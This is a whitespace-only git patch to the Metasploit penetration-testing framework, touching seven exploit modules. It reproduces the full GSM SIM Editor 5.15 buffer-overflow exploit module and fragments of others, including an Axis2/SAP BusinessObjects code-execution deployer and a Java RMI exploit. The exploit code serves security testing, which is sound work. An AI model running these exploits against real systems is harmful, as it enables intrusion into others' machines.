From 2ee620cee441dc759934dbaa1db2abf0d8d97a30 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 31 May 2012 18:18:27 -0600 Subject: [PATCH] Whitespace, thanks msftidy.rb! --- .../exploits/linux/http/dolibarr_cmd_exec.rb | 2 +- modules/exploits/multi/http/axis2_deployer.rb | 80 +++++----- .../exploits/multi/misc/java_rmi_server.rb | 6 +- .../windows/browser/ms10_002_ie_object.rb | 2 +- .../windows/fileformat/cyberlink_p2g_bof.rb | 2 +- .../exploits/windows/fileformat/gsm_sim.rb | 150 +++++++++--------- .../windows/license/flexnet_lmgrd_bof.rb | 2 +- 7 files changed, 122 insertions(+), 122 deletions(-) diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 3cf35f8da3..6f7cb3df03 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote }) return [nil, nil] if not (res and res.headers['Set-Cookie']) - + # Get the session ID from the cookie m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/) id = (m.nil?) ? nil : m[1] diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 9c751d5e66..889642fce5 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -8,13 +8,13 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ExcellentRanking - HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] } + HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] } - include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient - def initialize(info = {}) + def initialize(info = {}) super(update_info(info, 'Name' => 'Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)', 'Description' => %q{ 
@@ -23,18 +23,18 @@ class Metasploit3 < Msf::Exploit::Remote }, 'References' => [ - # General - [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ], - [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ], - [ 'CVE', '2010-0219' ], + # General + [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ], + [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ], + [ 'CVE', '2010-0219' ], ], 'Platform' => [ 'java', 'win', 'linux' ], # others? 'Targets' => [ [ 'Java', { 'Arch' => ARCH_JAVA, - 'Platform' => 'java' - }, + 'Platform' => 'java' + }, ], # # Platform specific targets only @@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote + mep="http://www.w3.org/2004/08/wsdl/in-only" + class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/> + mep="http://www.w3.org/2004/08/wsdl/in-out" + class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/> - metasploit.PayloadServlet + metasploit.PayloadServlet } @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote zip.add_file("metasploit/PayloadServlet.class", servlet) contents = zip.pack - end + end boundary = rand_text_alphanumeric(6) 
@@ -134,27 +134,27 @@ class Metasploit3 < Msf::Exploit::Remote return end =begin - res = send_request_raw({ - 'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp", - 'method' => 'GET', - 'headers' => - { - 'Cookie' => "JSESSIONID=#{session}", - } - }, 25) - puts res.body - puts res.code - if res.code > 200 and res.code < 300 - if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) ) - dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\" - puts dir - else - if ( a.scan(/catalina\.home<\/th>(.*) <\/td>/i) ) - dir = $1 + "/webapps/dswsbobje/WEB-INF/services/" - puts dir - end - end - end + res = send_request_raw({ + 'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp", + 'method' => 'GET', + 'headers' => + { + 'Cookie' => "JSESSIONID=#{session}", + } + }, 25) + puts res.body + puts res.code + if res.code > 200 and res.code < 300 + if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) ) + dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\" + puts dir + else + if ( a.scan(/catalina\.home<\/th>(.*) <\/td>/i) ) + dir = $1 + "/webapps/dswsbobje/WEB-INF/services/" + puts dir + end + end + end =end print_status("Polling to see if the service is ready") @@ -241,7 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::ConnectionError print_error("http://#{rhost}:#{rport}#{rpath}/(rest|services) Unable to authenticate (#{res.code} #{res.message})") end - end + end def cleanup_instructions(rpath, name) print_line("") @@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote print_line("") end - def exploit + def exploit user = datastore['USERNAME'] pass = datastore['PASSWORD'] rpath = datastore['PATH'] @@ -345,4 +345,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end \ No newline at end of file +end diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index 85ca51e297..b36472cddb 100644 
--- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote # RMI protocol specification [ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'], # Placeholder reference for matching - [ 'MSF', 'java_rmi_server'] + [ 'MSF', 'java_rmi_server'] ], 'DisclosureDate' => 'Oct 15 2011', 'Platform' => ['java', 'win', 'osx', 'linux', 'solaris'], @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(1099) ], self.class) - + register_autofilter_ports([ 1098, 1099 ]) register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry }) end @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Not exploitable: the RMI class loader is disabled") return end - + print_good("Target #{rhost}:#{rport} may be exploitable...") # Wait for the request to be handled diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb index d51b39a25f..b319706025 100644 --- a/modules/exploits/windows/browser/ms10_002_ie_object.rb +++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => "MS10-002 Internet Explorer Object Memory Use-After-Free", 'Description' => %q{ This module exploits a vulnerability found in Internet Explorer's - mshtml component. Due to the way IE handles objects in memory, it is + mshtml component. Due to the way IE handles objects in memory, it is possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext to be used even after it gets freed, therefore allowing remote code execution under the context of the user. diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb index 1b690baa74..e20f435c92 100644 
--- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb +++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_payload(hunter) - + [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name| enc = framework.encoders.create(name) if name =~ /unicode/ diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb index a70f4c4ca6..d376bc8213 100644 --- a/modules/exploits/windows/fileformat/gsm_sim.rb +++ b/modules/exploits/windows/fileformat/gsm_sim.rb 
@@ -1,75 +1,75 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
-
- include Msf::Exploit::FILEFORMAT
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',
- 'Description' => %q{
- This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.
- When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer
- overflow occurs which allows an attacker to execute arbitrary code.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'Ruben Alejandro',
- 'chap0 ',
- 'Lincoln '
- ],
- 'References' =>
- [
- [ 'EDB', '14258' ]
- ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'process',
- },
- 'Platform' => 'win',
- 'Payload' =>
- {
- 'Space' => 2000,
- 'BadChars' => "\x00",
- 'DisableNops' => true,
- 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500
- },
- 'Targets' =>
- [
- [ 'Windows XP SP3',
- {
- 'Ret' => 0x00405201, # call esp - SIMEditor.exe
- 'Offset' => 810
- }
- ]
- ],
- 'Privileged' => false,
- 'DisclosureDate' => 'Jul 07 2010',
- 'DefaultTarget' => 0))
-
- register_options(
- [
- OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),
- ], self.class)
-
- end
-
- def exploit
- buffer = rand_text_numeric(target['Offset'])
- buffer << [target.ret].pack('V').unpack("H*")[0]
- buffer << make_nops(30).unpack("H*")[0]
- buffer << payload.encoded.unpack("H*")[0]
-
- file_create(buffer)
- end
-
-end
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.
+ When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer
+ overflow occurs which allows an attacker to execute arbitrary code.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Ruben Alejandro',
+ 'chap0 ',
+ 'Lincoln '
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '14258' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'Space' => 2000,
+ 'BadChars' => "\x00",
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500
+ },
+ 'Targets' =>
+ [
+ [ 'Windows XP SP3',
+ {
+ 'Ret' => 0x00405201, # call esp - SIMEditor.exe
+ 'Offset' => 810
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Jul 07 2010',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),
+ ], self.class)
+
+ end
+
+ def exploit
+ buffer = rand_text_numeric(target['Offset'])
+ buffer << [target.ret].pack('V').unpack("H*")[0]
+ buffer << make_nops(30).unpack("H*")[0]
+ buffer << payload.encoded.unpack("H*")[0]
+
+ file_create(buffer)
+ end
+
+end
diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
index 599e325abc..dc69d352eb 100644
--- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
+++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'BID', '52718' ],
 [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-052/' ],
 [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],
- [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
+ [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
 ],
 'Privileged' => true,
 'DefaultOptions' =>